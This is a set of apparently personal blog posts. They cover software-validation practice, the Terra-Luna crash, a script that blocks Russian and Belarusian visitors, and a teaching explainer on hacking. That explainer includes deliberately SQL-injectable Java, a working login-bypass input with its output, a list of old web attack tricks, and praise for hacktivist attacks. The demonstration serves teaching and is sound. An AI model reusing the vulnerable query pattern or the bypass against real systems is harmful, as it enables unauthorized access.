In an ideal world, verification tests are executed through automation and/or your engineering team, while validation tests are done by actual end users. In reality, most end-users aren’t qualified to do a good job, and you risk wasting time on “test theater” that doesn’t really prove anything. You’ll have to find your own way here; a reasonable approach might be to (a) make sure end-users are formally involved in the up-front process of creating specifications, and (b) label your test cases as “verification” or “validation” to show you’ve been thoughtful about both concepts.

Design Documents

Significant architectural decisions should be recorded in “design documents.” These are just engineer-focused documents in any form that help describe “how” the product is built. Think about the kind of documentation you’d like to show to a new developer on the team before they jump into code. Associating design documents with component-level features is a great way to keep a handle on how it all fits together.

Third-party software and/or “SOUP”

If your product incorporates COTS (“Commercial / Off The Shelf”) software, that also needs to be validated. Some vendors may be able to help you with this, and some may already have a base level validation that you can start from. But in most cases, you’ll want to show that the acquired software does what you need it to do. This is typically a “one-and-done” exercise where you (a) document your requirements and (b) write and execute test cases to show the product satisfies those requirements.

This applies to third-party libraries you use as well, and even to your own internal software that may have been developed “way back when” without any documentation at all (sometimes called SOUP, for “Software of Unknown Provenance”). The same process applies — write some requirements, write some tests, run the tests, and have that documentation ready for auditors.

Surveillance

“Bugs found in the wild” is a fantastic measure of software quality (hint: fewer is better). Your regulatory team should be managing formal “complaints” (escalating to you as needed), but keeping track of which bugs were found post-release is a great practice that will serve you well. A quarterly meeting to discuss trends and identify problematic features shows that you’re taking it seriously, so keep meeting notes and be prepared to show a graph of incidents and their severity over time.

Approvals and Signatures

This is an area that really bugs me. Regulatory folks can get super hung-up on ink-based signatures and extreme measures to ensure that documentation is “tamper-proof.” Full stop, I think this is a waste of time. Regulation is not intended to stop a sophisticated bad actor — it’s supposed to help folks trying to do the right thing. The burden of security theater can be stupid high. My take:

  • The software you use to manage requirements and tests should require login and keep track of who creates/updates items in the system.
  • Don’t delete stuff; instead use “inactive” or “obsolete” statuses to keep irrelevant or mistaken entries out of everyday view.
  • Make sure that the appropriate people (especially end users) mark their approval of requirements and tests in the system by clicking a button or writing a comment, and be able to show a record of that.
  • Don’t go overboard.

A final note about audits and auditors

You’re never going to be “done” tweaking and evolving this stuff. Auditors are paid to find issues, and no matter how great you are, they’re going to find some. Don’t sweat it and don’t be defensive. Listen, create a plan to address what they find, and then — this is the real key — follow through. When that auditor comes back they’re going to assess your response, and the worst thing you can do is just ignore them. If you disagree, start a dialogue and you’re sure to find a reasonable compromise.

Bottom line — bureaucracy is bureaucracy, and there is for sure burden associated with complying with regulation. Some of that burden is stupid, and some of it helps. Believe it or not, the actual regulators really do understand this, and are always working to make it simpler (even right now). Your biggest challenge will be the “industry” of high-priced consultants who are incented only to keep you worried and paying their hourly fees. Don’t freak out. Put in a little work to understand the real intent, honestly work to incorporate the key concepts — and you’ll be just fine.

More crypto hijinks, aka WTF happened to Terra-Luna?

Today I’m setting aside my belief that all crypto is doomed to fail. It is, but that’s a medium-term diagnosis — at least for now, and ignoring the day-to-day bugs that occur in all software, blockchain technology certainly works as advertised. It’s actually super-cool and worth reading up on; my articles on crypto theory and implementation are just two of many reasonable places to start.

But sadly, even if you suspend disbelief about the technology itself, it’s being used to build a ton of straight up con games. That’s maybe a bit harsh — there are obviously true believers out there, but they’re so mixed up together with the con artists that it’s harder and harder to tell the difference. And honestly, when it’s my money on the line, that “difference” doesn’t really matter anyways.

In just the latest example, willful misuse of the word “stable” tanked somewhere between 92-100% of value for “investors” in UST and LUNA tokens; that’s about $45 BILLION USD. And despite an (ever-shrinking) number of frantic screeds to the contrary, that money ain’t coming back, ever. Too bad, so sad.

In the crypto world, a ton has been written about this crash already. Most of those folks know way more than I do, but I thought it’d be useful to create something for the more casual observer, one that doesn’t live and die by their hardware wallet and is curious how things could implode so quickly and so completely.

The short story is just that it was all bullsh*t to begin with, but let’s take a closer look.

Stablecoins

The first thing anybody new to cryptocurrency asks is “but why do people think it’s worth anything?” This tends to quickly become a philosophical conversation, because there is no real answer other than “belief.” People believe that it has value, and they believe that others will agree when it comes time to trade that value for goods or services or whatever. So long as nobody looks at it too hard, all is well. It seems ridiculous when you say it that way, but that’s basically how the US Dollar works too, ever since the US government abandoned the gold standard (domestically in 1933, and completely in 1971). For that matter you can go even further down the rabbit hole: why is gold itself worth anything? Sure there are some commercial use cases for the metal, but that’s just noise; really it just comes down to belief.

But despite that semi-logical equivalence, there is definitely a huge popularly-perceived difference between cryptocurrencies, which can be created on a whim by deploying a new blockchain (or just a smart contract), and “fiat” currencies that are backed by a government or similar supposedly-reliable entity. “Stablecoins” were invented as a solution for folks that like the mechanics of cryptocurrency (anonymity, smart contracts, etc.) but want the confidence that comes with traditional money.

Stablecoins are honestly just about the only thing in the crypto world that are truly easy to understand. It’s just the gold standard for 2022 — somebody “mints” new crypto tokens and promises that each one is “backed” by actual reserves of some fiat or hard currency. For example, Tether tokens are minted by Tether Holdings Limited, a company registered in Hong Kong, and are guaranteed to be backed 1:1 with real world reserves. Each of their USDT tokens is backed by $1 USD, so at least theoretically you can always swap one for a crisp new Washington. This makes them “stable” — their value should never fluctuate more than the reserve currency does.

Of course, to trust the token you have to trust the entity holding the reserves — despite its price stability Tether hasn’t made a lot of friends in the New York AG’s office. There will always be good companies and bad companies out there, and the balance with regulators is a never-ending dance. But at least the concept makes sense and is fundamentally sound.

Not-so-stablecoins

Alas, true stablecoins are just too simple for some folks. It is true that they are only as “safe” as the entity that vouches for them. And the asset centralization they require does run contrary to crypto’s power-to-the-people vibe. One attempt at addressing these issues is the so called “algorithmic stablecoin,” an interesting concept that unfortunately doesn’t deserve its moniker. Until a few days ago, the most popular algorithmic stablecoin was UST or “Terra.”

Here’s how it worked. At first, UST wasn’t backed by any reserves at all. Instead it was launched with a sister coin, a traditional cryptocurrency called LUNA. Terra is the earth and Luna is the moon, get it? The trick was that you could always trade LUNA for UST as if UST was worth exactly $1 USD. Trading from one coin to the other was destructive: the tokens you hand over are destroyed, and the tokens you receive (a dollar’s worth of LUNA per UST, or vice versa) are newly minted.

In theory, this dynamic would cause behavior that always kept UST right around that $1 USD “peg.” This stuff is really hard for me to keep track of, so here’s how it breaks down:

  • Say UST is trading at $1.01 (USD) and LUNA is at $10.
  • I buy 1 LUNA token for $10 USD.
  • I swap my LUNA for UST. Because this is always done as if UST was worth $1, I get 10 new UST tokens and my original LUNA token is destroyed.
  • I sell my UST and receive $10.10 USD.

Woo hoo! I’m now $.10 richer than I was (at least if you ignore the transaction fees). Critically, because there is now more UST in the world, it has become less scarce which will naturally push the price down towards $1. People will keep making this trade and taking profits until it hits the peg again.

The reverse works just as well. If UST is trading for $.99, I can start with a UST purchase, swap to LUNA and then sell that for USD. I make the same profit, but UST becomes more scarce this time, pushing the price back up towards $1. Since the LUNA side of the algorithm isn’t pegged to anything, it is free to swing up and down with the market, just like BTC or any other cryptocurrency. In this way LUNA was said to “absorb volatility” for UST.
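If the arithmetic is easier to follow in code, here is a small sketch of both trades. It is only a toy model under loud assumptions: the function names are mine, fees and slippage are ignored, and prices are assumed not to move while the trade happens (which is exactly what stopped being true in real life).

```python
from decimal import Decimal

PEG = Decimal("1.00")  # the swap always treats 1 UST as worth exactly $1


def profit_when_ust_above_peg(ust_price, luna_price, luna_bought=1):
    """Buy LUNA with USD, burn it for freshly minted UST, sell the UST."""
    usd_spent = luna_price * luna_bought
    ust_minted = usd_spent / PEG  # $10 of LUNA becomes 10 UST
    usd_received = ust_minted * ust_price
    return usd_received - usd_spent


def profit_when_ust_below_peg(ust_price, ust_bought=10):
    """Buy UST with USD, burn it for $1 of LUNA per token, sell the LUNA."""
    usd_spent = ust_price * ust_bought
    usd_received = PEG * ust_bought  # LUNA worth $1 for each UST burned
    return usd_received - usd_spent


above = profit_when_ust_above_peg(Decimal("1.01"), Decimal("10"))
below = profit_when_ust_below_peg(Decimal("0.99"))
print(above, below)
```

Both calls come out to ten cents of profit on a ten-token trade. The first one mints UST (more supply, price drifts down) and the second one burns it (less supply, price drifts up), which is the whole “algorithm.”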

As long as people stay interested in UST, it should keep its peg and LUNA will thrive. The “Anchor” protocol was the third leg of that stool — a scheme by which folks could deposit their UST tokens in return for an annual interest rate of 20%. Compared to anything in the “traditional” finance world, that is an insane guaranteed rate of return. Where did it come from? Anchor acts as a traditional money market for UST and additionally uses its holdings to earn staking rewards on other proof-of-stake blockchains (see here for a little jargon relief). To be fair, Anchor tweaked things over time, but that’s it in broad strokes. People were incented to buy UST and deposit it with Anchor — something like 70% of the entire UST supply lived there.

A-bit-more-stablecoins

All this is very cute, but it’s still just part of the larger crypto shell game. Neither UST nor LUNA was actually backed up by anything but belief. Folks did actually notice this, creating demand that at the start of this year resulted in the founding of the “Luna Foundation Guard.” The LFG was created to help backstop the UST/LUNA ecosystem, primarily with $3.5B in BTC. Now sure we’re backing crypto with crypto — but it is fair to say that of all the crypto out there, Bitcoin is probably the “safest” (yeesh, I just threw up a little writing that).

Between their algorithms, Anchor and the LFG it seemed like UST/LUNA was riding pretty high, with a combined market cap of about $60B USD just last month. Of course $3.5B against $60B is nothing like a true stablecoin reserve, but it was something, and was met with real enthusiasm. (In an amusing-for-some-of-us anecdote, LFG acquired about $1B of that reserve by trading UST to Genesis!)

And, scene.

Right around May 7, a few huge investors started dumping UST (for example this swap of $85M into the actual stablecoin USDC). Most of these dumps came out of Anchor deposits, which eroded trust in future Anchor yields and triggered cascading exits. LFG did what it was supposed to and deployed resources to shore things up, but it didn’t help. And as the supply of UST kept going down, the supply of LUNA exploded: more than 6,000 BILLION new LUNA tokens were minted this month, which of course destroyed its value too.

As of today, the LFG resources are exhausted and the Korean police are sequestering their remaining assets. Meanwhile, the asshat crypto-bro that started all this just keeps on rolling and is trying to convince people to jump on board with his new “Terra 2.0” … holy crap.

Anonymity being what it is, it’s not entirely clear why things collapsed as quickly as they did. I’ve read speculation that it was an orchestrated attempt by BTC shorts: forcing LFG to sell its holdings all at once created downward pressure on Bitcoin that others could take advantage of. But it’s all basically guesses, and you don’t really need a conspiracy theory to explain the implosion. Belief-based value is only good as long as people keep believing. The whole market has been on shaky ground, and the mostly-unregulated crypto market is incredibly vulnerable to panic.

TLDR, saying something is “stable” doesn’t magically make it so.

Look, I’m the farthest thing from a financial genius. But what I believe is this — the most reliable way to lasting value is to build things that improve the world. For sure some new things are coming out of the crypto world, and those will last. But most of it? Garbage.

RuBy – Blocking Russia and Belarus

The Internet is a funny place. At the exact same moment that Russian troops are committing war crimes in the real world, Russian users online are just bopping around as if everything is cool. ShutdownHook is anything but a large-scale website, but it does get enough traffic to provide interesting insights in the form of global usage maps. And pretty much every day, browsers from Russia (and very occasionally Belarus) are stopping by to visit.

Well, at least they were until this afternoon. My love for free speech does not extend to aiding and abetting my enemies — and until the people of Russia and Belarus abandon their attacks on Ukraine, I’m afraid that is the best term for what they are. And before you spin up the de rigueur argument about not punishing people for the acts of their government, please just save it. I get the point, but there is nobody on earth that can fix these countries other than their citizens. They do bear responsibility — just as I and my fellow Americans did when we granted a cowardly, bullying toddler the United States’ nuclear codes for four years. Regardless of our individual votes.

Anyways, while I’m certainly not changing the world with my amateur postings here on ShutdownHook, I am trying in a very small way to share ideas and experience that will make folks better engineers and more creative and eclectic individuals. And I just don’t want to share that stuff with people who are, you know, helping to kill families and steal or destroy their homes. Weird, I know.

Enter RuBy — a tiny little web service that detects browsers from these two countries and replaces site content with a static Ukrainian Flag. You can add it to your web site too, and I hope you will. All it takes is one line anywhere on your site:

 <script src="https://shutdownapps.duckdns.org:7076/ruby.js" type="text/javascript" defer></script>

It’s not perfect — the same VPN functionality that folks use to stream The Great Pottery Throw Down before it’s available in the States will foil my script. But that’s fine — the point is to send a general message that these users are not welcome to participate in civilized company, and I think it does the trick.

If you’d rather not use the script from my server, the code is freely-available on github — go nuts. I’ll cover all the details in this post, so keep on reading.

Geolocation Basics

Image credit Wikipedia

Geolocation is a general term for a bunch of different ways to figure out where a particular device exists in the real world. The most precise of these is embedded GPS. Pretty much all of our phones can receive signals from the GPS satellite network and use that information to understand where they are — it’s how Google Maps shows your position as you sit in traffic during your daily commute. It’s amazing technology, and the speed with which we’ve become dependent on it is stunning.

Most other approaches to positioning are similar; they rely on databases that map some type of identifiable signal to known locations. For your phone that might be cell towers, each of which broadcasts a unique identifier. Combining this data (e.g., from opencellid.org) with real-time signal strength can give some pretty accurate results. You can do the same thing with a location-aware database of wifi networks like the one at wigle.net (the nostalgia behind “wardriving” is strong for this nerd). Even the old WWII-era LORAN system basically worked this way.

But the grand-daddy of location techniques on the Internet is IP-based geolocation, and it remains the most common for locating far-away clients without access to signal-based data. Each device on the Internet has an “IP Address” used to route messages — you can see yours at https://whatsmyip.com/ (ok technically that’s probably your router’s address, but close enough). This address is visible to both sides of a TCP/IP exchange (like a browser making a request to a web server), so if the server has access to a location-aware database of IP addresses, it can estimate the browser’s real-world location. The good folks at ip2location.com have been maintaining exactly this database for years, and insanely they still make a version available for free at https://lite.ip2location.com/.

The good news for IP-based geolocation is that it’s hard to technically spoof an IP address. The bad news is that it’s easy to insert devices between your browser and a server, so spoofing isn’t really even required to hide yourself. The most common approach is to use a virtual private network (“VPN”). With a VPN your browser doesn’t directly connect to the web server at all — instead, it connects to a VPN server and asks it to talk to the real server on your behalf. As far as the server is concerned, you live wherever your VPN server lives.

There are whole companies like NordVPN that deliver VPN services. They maintain thousands of VPN servers — one click makes your browser appear to be anywhere in the world. Great for getting around regional streaming restrictions! And to be fair, a really good way to increase your privacy profile on the Internet. But still, just a teeny bit shady.

Geo-Blocking

There are a few ways to use IP-based location data to restrict who is allowed to visit a website. Most commercial or high-traffic sites sit behind some kind of a firewall, gateway or proxy, and most of these can automatically block traffic using location-based rules. This is actually pretty common, in particular to protect against countries (you know who you are) that tend to be havens for bad actors. Cloud providers like Azure and AWS are making this kind of protection more and more accessible, which is a great thing.

Another approach is to implement blocking at the application level, which is what I’ve done with RuBy. In theory this is super-simple, but there are some interesting quirks of the IP addressing landscape that make it worth some explanation.

But first a quick side note — there are no new ideas, and it turns out that I’m not the only person to have come up with this one. The folks over at redirectrussia.org have a script as well — it’s a little more complicated than mine, and a bit smarter — e.g., they limit web service calls by doing a first check on the browser’s timezone setting. They also allow the site owner to redirect blocked clients to a site of their choosing, whereas I just slap a flag over the page and call game over. Whichever you pick, you’re doing a solid for the good guys.

RuBy as a Web Service

Using the web service is about as simple as it gets; just add that one-line script fragment anywhere on your page and you’re done. Under the covers, what happens is this:

  • The browser fetches some javascript from the URL at https://shutdownapps.duckdns.org:7076/ruby.js. Note the “defer” attribute on the tag; this instructs the browser to load the script asynchronously and delay execution until the rest of the page is loaded. This avoids any performance impact for pages using the script.
  • The web service examines the incoming IP address and compares it to a list of known address ranges coming from Russia and Belarus. If the IP is not in one of those ranges, an empty script is returned and the page renders / behaves normally.
  • If the IP is in one of those ranges, the returned script replaces the HTML of the page with a full-window rendering of the Ukrainian flag (complete with official colors #005BBB and #FFD500). I considered redirecting to another site, but preferred the vibe of fully dead-ending the page.
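The three steps above boil down to a very small decision on the server. Here is a rough sketch of that decision; it is a stand-in, not the actual service code. The `script_for` function, the `is_blocked` callback and the exact JavaScript string are all assumptions of mine, and only the two flag colors come from the description above.

```python
BLUE, YELLOW = "#005BBB", "#FFD500"  # flag colors quoted above

# Hypothetical script body: swaps the whole page for two stacked color bands.
FLAG_SCRIPT = (
    "document.documentElement.innerHTML = "
    "'<body style=\"margin:0\">"
    f"<div style=\"height:50vh;background:{BLUE}\"></div>"
    f"<div style=\"height:50vh;background:{YELLOW}\"></div>"
    "</body>';"
)


def script_for(client_ip, is_blocked):
    """Return the JavaScript to serve: empty for normal visitors, the flag otherwise."""
    return FLAG_SCRIPT if is_blocked(client_ip) else ""


# Usage with a toy lookup; 203.0.113.0/24 is a documentation-only address range.
toy_lookup = lambda ip: ip.startswith("203.0.113.")
print(repr(script_for("198.51.100.7", toy_lookup)))
print(script_for("203.0.113.9", toy_lookup))
```

Returning an empty script for everyone else is what keeps the tag harmless on a normal page view: the browser runs nothing and the page renders as usual.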

Most systems can pretty easily add script tags to template pages. For ShutdownHook it was a little harder because I was using a subscription plan at WordPress.com that doesn’t allow it. This isn’t a problem if you’re on the “business” plan (I chose to upgrade) or are hosting the WordPress software yourself or anywhere that allows plugins. After upgrading, I used the very nice “Insert Headers and Footers” plugin to insert the script tag into the HEAD section of my pages.

And really, that’s it. Done and done.

RuBy Under the Covers

The lookup code itself lives in RuBy.java. It depends on access to the IP2Location Lite “DB1” database; in particular the IPV6 / CSV version. Now, there are tons of ready-to-go libraries for working with this database, including for Java. I chose to implement my own because RuBy has very specific, simple requirements that lend themselves to a more space- and time-efficient implementation than a general-purpose library. A classic engineering tradeoff — are those benefits worth the costs of implementation and code ownership? In my case I think so, because I’m running the service for free and want to keep hardware costs to a minimum, but there are definitely arguments on both sides.

In a nutshell, RuBy is configured with a database file and a list of countries to block (specified as ISO-3166 alpha-2 codes). It makes a number of assumptions about the format of the data file (listed at the top of the source file), so be careful if you use another data source. Only matching ranges are loaded into an array sorted by the start of the range, and queries are handled by binary-searching into the array to find a potentially matching range and then checking its bounds. For Russia and Belarus, this ends up holding only about 18,000 records in memory, so resource use is pretty trivial.
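For the curious, the load-then-binary-search idea looks roughly like this. It is a Python sketch rather than the Java in RuBy.java, and it assumes a CSV layout of start, end, country code, country name per row; the sample rows and their numbers are invented for illustration.

```python
import bisect
import csv
import io


def load_ranges(csv_text, blocked_countries):
    """Keep only (start, end) ranges for blocked countries, sorted by start."""
    ranges = []
    for row in csv.reader(io.StringIO(csv_text)):
        start, end, country = int(row[0]), int(row[1]), row[2]
        if country in blocked_countries:
            ranges.append((start, end))
    ranges.sort()
    return ranges


def is_blocked(ranges, address):
    """Binary-search for the last range starting at or before address, then check its end."""
    i = bisect.bisect_right(ranges, (address, float("inf"))) - 1
    return i >= 0 and ranges[i][0] <= address <= ranges[i][1]


# Invented sample data in the assumed column order.
SAMPLE = '''"100","199","RU","Russian Federation"
"200","299","US","United States of America"
"300","399","BY","Belarus"
'''

ranges = load_ranges(SAMPLE, {"RU", "BY"})
print(ranges)
print(is_blocked(ranges, 150), is_blocked(ranges, 250), is_blocked(ranges, 300))
```

Because unblocked countries are dropped at load time, an address that falls in a gap between stored ranges simply fails the bounds check, so there is no need to keep the rest of the database in memory.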

IP addressing does get a little complicated though; converting text-based addresses to the integer values in the lookup array can be tricky.

Once upon a time we all used “v4” addresses, which you’ve surely seen and look like this: 127.0.0.1. Each of the four numbers is a byte value from 0-255, so there are 8 * 4 = 32 bits available for a total of about 4.3 billion unique addresses. Converting these to a number is a simple matter that will look familiar to anyone who ever had to implement “atoi” in an interview setting:

a.b.c.d = (16777216 * a) + (65536 * b) + (256 * c) + d
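Here is that formula as a few lines of Python, cross-checked against the standard library’s `ipaddress` module. The `ipv4_to_int` name is mine, and the sketch skips input validation entirely.

```python
import ipaddress


def ipv4_to_int(address):
    """Apply the formula above to a dotted-quad string (no validation)."""
    a, b, c, d = (int(part) for part in address.split("."))
    return (16777216 * a) + (65536 * b) + (256 * c) + d


for text in ("127.0.0.1", "0.0.0.0", "255.255.255.255"):
    ours = ipv4_to_int(text)
    theirs = int(ipaddress.IPv4Address(text))  # the library's own conversion
    print(text, ours, ours == theirs)
```

The multipliers are just 256 cubed, 256 squared and 256, so each number lands in its own byte of the 32-bit result.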

Except, oops, it turns out that the Internet uses way more than 4.3 billion addresses. Back a few years ago this was the source of much hand-wringing and in fact the last IPv4 addresses were allocated to regional registries more than a decade ago. The long-term solution to the problem was to create “v6” addressing which uses 128 bits and can assign a unique address to a solid fraction of all the atoms that make up planet Earth. They’re pretty ugly (e.g., 2001:0db8:85a3:0000:0000:8a2e:0370:7334), but they do the trick.

Sadly though, change is hard, and IPv4 has stubbornly refused to die — only something like 20-40% of the traffic on the Internet is currently using IPv6. Mostly this is because somebody invented NAT (Network Address Translation) — a simple protocol that allows all of the dozens of network devices in your house or workplace to share a single public IP address. So at least for the foreseeable future, we’ll be living in a world where both versions are out in the wild.

To get the most coverage, we use the IP2Location database that includes both v4 and v6 addresses. All of the range values in this database are specified as v6 values, which we can manage because a v4 address can be converted to v6 just by adding “::FFFF:” to the front. This amounts to adding an offset of 281,470,681,743,360 to its natural value — you can see this and the other gyrations we do in the addressToBigInteger method (and for kicks its reverse in bigIntegerToAddress).
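The offset is easy to sanity-check. The sketch below is a Python stand-in for the idea, not a port of addressToBigInteger; the `address_to_int` name is an assumption, and it leans on the standard `ipaddress` module to do the parsing.

```python
import ipaddress

# "::FFFF:" in front of a v4 address puts 0xFFFF just above the low 32 bits.
V4_MAPPED_OFFSET = 0xFFFF << 32


def address_to_int(text):
    """Convert a v4 or v6 address string into a single v6-style integer."""
    addr = ipaddress.ip_address(text)
    value = int(addr)
    if addr.version == 4:
        value += V4_MAPPED_OFFSET  # lift the v4 value into the mapped v6 range
    return value


print(f"{V4_MAPPED_OFFSET:,}")
print(address_to_int("127.0.0.1") == int(ipaddress.IPv6Address("::ffff:127.0.0.1")))
```

With both address families reduced to one integer space, a single sorted array of ranges can serve every lookup.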

Spread the Word!

Technically, that’s about it — pretty simple at the end of the day. But getting everything lined up cleanly can be a bit of a hassle; I hope that between the service and the code I’ve made it a little easier.

Most importantly, I hope people actually use the code on their own websites. We really are at a critical moment in modern history — are we going to evolve into a global community able to face the big challenges, or will we slide back to 1850 and play pathetic imperialist games until we just extinguish ourselves? My generation hasn’t particularly distinguished itself yet in the face of this stuff, but I’m hopeful that this disaster is blatant enough that we’ll get it right. My call to action:

  • If you run a website, consider blocking pariah nations. You can do this with your firewall or gateway, with the RuBy or Redirect Russia scripts, or just roll your own. The only sites I hope we’ll leave open are the ones that might help citizens in these countries learn the truth about what is really happening.
  • Share this article with colleagues and friends on social media so they can do the same.
  • And even more key, (1) give to causes like MSF that provide humanitarian aid, and (2) make sure our representatives continue supporting Ukraine with lethal aid and punishing Russia/Belarus with increasing sanctions.

If I can help with any of this, just drop me a line and let me know.

Attribution: This site or product includes IP2Location LITE data available from https://lite.ip2location.com.

You got your code in my data, or, how hacks work.

Once upon a time, hacking was easy and cheap entertainment, and we did it all the time:

  • Microsoft’s web server used to just pass URLs through to the file system, so often you could just add “::$DATA” to the end of a URL and read source code.
  • Web server directory browsing was usually enabled, making it super-easy to troll around for config files, backups or other goodies.
  • SQL injection bugs (more on this later) were rampant.
  • A shocking number of servers exposed unsecured pages like /env.php and /test.php.
  • …and many more.

The arms race has spiraled higher and higher since those simple happy days. Today, truly novel technical hacks are pretty rare, but the double-threat of social engineering (phishing, etc.) and sloppy patch management (servers left running with known vulnerabilities) is as common as ever, and so the dance goes on. As I understand it, most of the successful attacks currently being executed by Anonymous against Russia (and frankly bully for that good work) are just old scripts running against poorly-maintained servers. It’s more about saturating the attack space than finding new vulnerabilities.

But per the usual, it’s the technical side that I find endlessly fascinating. And since there’s a pretty big gap between what gets reported on the news (“The Log4j security flaw could impact the entire internet”) and in the security forums (“Apache Log4j2 2.0-beta9 through 2.15.0 excluding security releases 2.12.2, 2.12.3, and 2.3.1 – JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints”), I thought it’d be fun to try to help normal humans understand what’s going on.

Most non-social hacks involve an attacker entering data into a system (using input fields, URLs, etc.) that ends up being executed as code inside that system. Once it’s inside a trusted process, code can do pretty much anything — read and write files, update the environment, make network calls, all kinds of bad stuff. There are approaches to limit the damage, but in most cases it’s Game Over.

Folks trying to hack a particular system will first try to understand the attack surface — that is, all of the ways users can provide input to the system. These can be totally legitimate channels, like a login form on a web site; or accidental ones, like administrative network ports exposed to the public network. Armed with this inventory, hackers attempt to craft data values that allow them to inject and execute code inside the process.

I’m going to dig into three versions of that pattern: SQL Injections, stack-based buffer overruns, and the current bugaboo Log4Shell. There’s a lot here and it’s definitely too long, but I was having too much fun to stop. That said, each of the sections stands alone, so if you have a favorite exploit feel free to jump around!

Note: I am providing real code for two of these; you can totally run it yourself and I hope you will. And before you freak out — nothing I am sharing is remotely novel to the Bad Guys out there. I may have lost some of my Libertarian leanings over the past few years, but I still believe that trying to protect people by hiding facts or knowledge never, ever, ever turns out well in the end. It just cedes power to the wrong side.

1. The Easy One (SQL Injection)

Most of the websites you use every day store their information in databases, or more specifically structured databases that are accessed using a language called SQL. A SQL database keeps information in “tables” which are basically just Excel worksheets — two-dimensional grids in which each row represents an item and each column represents some feature of that item. For example, most systems will have a “users” table that keeps one row for every authorized user. Something like this:

Actually nobody really stores passwords like this unless they are monumentally stupid. And real databases typically contain a bunch of tables with complex relationships between them. But neither of these is important for our purposes here, so I’ve simplified a bit.

Anyways, “SQL” is the language used to add, update and retrieve data in these tables. To retrieve data, you construct a “select” command that specifies which columns and rows you wish to see. For example, if I want to find the email addresses of all administrators in the system, I might execute a command like this:

select email from users where is_admin = true;

Now let’s imagine we’re implementing a login page for a web site. We build an HTML form that has text boxes to enter “username” and “password,” and a “submit” button that sends them to our server. The server then constructs and runs a query such as the following:

select user from users where user = 'USERNAME' and pw = 'PASSWORD'

where USERNAME and PASSWORD represent the values provided by the user. If those values match a row in the database, that row will be returned, and we can grant the user access to the system. If not, zero rows will be returned, and we should instead return a “login failed” error message.

Most websites use something very much like this to manage access. It’s a classic situation in which data (the USERNAME and PASSWORD values) are mixed with code (the rest of the SQL query). As a hacker, is it possible for us to construct data that will change the behavior of the code around it? It turns out that the answer is absolutely yes, unless the developer has taken certain precautions. Let’s see how that works.

Sql.java uses “JDBC” and a (very nice) SQL database called “MySQL” to demonstrate an injection attack. On a system that has git, maven and a JDK installed, build this code as follows:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/hack
mvn clean package

Once built, it creates a table like the one above; you can simulate login attempts like this (using whatever values you like for the user and pass parameters at the end):

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad user2 pass2
Logged in as user: user2

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad user2 nope
Login failed.

The code that constructs the query is at line 47; a simple call to String.format() that inserts the provided username and password into a template SQL string:

String sql = String.format("select user from u where user = '%s' and pw = '%s'", user, password);

So far so good, but watch what happens if we use some slightly unusual parameters:

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad "user2' --" nope
Logged in as user: user2

Oh my. Even though we provided an incorrect password, we were able to trick the system into logging us in as user2 (an administrator no less). To understand how this happened, you need to know that SQL commands can contain “comments.” Any characters following “--” in a line of SQL are simply ignored by the interpreter. So if you apply these new input values to the String.format() call, the result is:

select user from u where user = 'user2' -- and pw = 'nope'

Our carefully constructed data values terminate the first input string and then cause the rest of the command to be ignored as a comment. Since the command now asks for all rows where user = 'user2' without any reference to the password, the row is faithfully returned, and login is granted. Of course, a hack like this requires knowledge of the query in which the input values will be placed, but thanks to the use of common code and patterns across systems, that is rarely a significant barrier to success.
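If you want to watch the string surgery happen without setting up a database, here is a minimal sketch that builds the same query text as the String.format() call above and just prints it. The class name InjectionSketch and the buildQuery helper are mine for illustration; they are not part of Sql.java.

```java
// Hypothetical illustration: shows only how the query text gets assembled.
class InjectionSketch {

    // Same template as the vulnerable code: user input is pasted straight into the SQL.
    static String buildQuery(String user, String password) {
        return String.format(
            "select user from u where user = '%s' and pw = '%s'", user, password);
    }

    public static void main(String[] args) {
        // A normal login attempt: both values stay inside their quotes.
        System.out.println(buildQuery("user2", "pass2"));
        // The injection: the quote closes the string early and "--" follows it.
        System.out.println(buildQuery("user2' --", "nope"));
    }
}
```

In the second line printed, the password clause ends up sitting after the comment marker, which is the whole trick.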

Fortunately, JDBC (like every SQL library) provides a way for us to prevent attacks like this. The alternate code at line 72 lets us breathe easy again (note we’re specifying sqlgood instead of sqlbad as the first parameter):

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlgood "user2' --" passX
Login failed.

Whew! Instead of directly inserting the values into the command, this code uses a “parameterized statement” with placeholders that enable JDBC to construct the final query. These statements “escape” input values so that special characters like the single-quote and comment markers are not erroneously interpreted as code. Some people choose to implement this escaping behavior themselves, but trust me, you don’t want to play that game and get it wrong.
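For reference, a parameterized login check in JDBC looks roughly like the sketch below. This is my own approximation and not a copy of the code in Sql.java; the class name, the LOGIN_SQL constant and the login helper are all assumptions, and the caller is expected to supply an open Connection.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Hypothetical sketch of a parameterized login check; not the code from Sql.java.
class ParameterizedLoginSketch {

    // The "?" placeholders mark where data goes; the SQL text itself never changes.
    static final String LOGIN_SQL = "select user from u where user = ? and pw = ?";

    // Returns true if a row matches. The caller supplies an open JDBC connection.
    static boolean login(Connection cxn, String user, String password) throws SQLException {
        try (PreparedStatement stmt = cxn.prepareStatement(LOGIN_SQL)) {
            stmt.setString(1, user);      // bound as data, quotes and all
            stmt.setString(2, password);
            try (ResultSet rs = stmt.executeQuery()) {
                return rs.next();         // any row at all means the credentials matched
            }
        }
    }
}
```

The point of the design is that the input values never get a chance to become part of the command text, so there is nothing for a stray quote to break out of.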

SQL injection was one of the first really “accessible” vulnerabilities — easy to perform and with a big potential payoff. And despite being super-easy to mitigate, it’s still one of the most common ways bad guys get into websites. Crazy.

2. The Grand-Daddy (Buffer Overrun)

In the early 2000s it seemed like every other day somebody found a new buffer overrun bug, usually in Windows or some other Microsoft product (this list isn’t all buffer exploits, but it does give you a sense of the magnitude of the problem). Was that because the code was just bad, or because Windows had such dominant market share that it was the juiciest target? Probably a bit of both. Anyways, at least to me, buffer overrun exploits are some of the most technically interesting hacks out there.

That said, there’s a lot of really grotty code behind them, and modern operating systems make them a lot harder to execute (a good thing). So instead of building a fully-running exploit in this section, I’m going to just talk us through it.

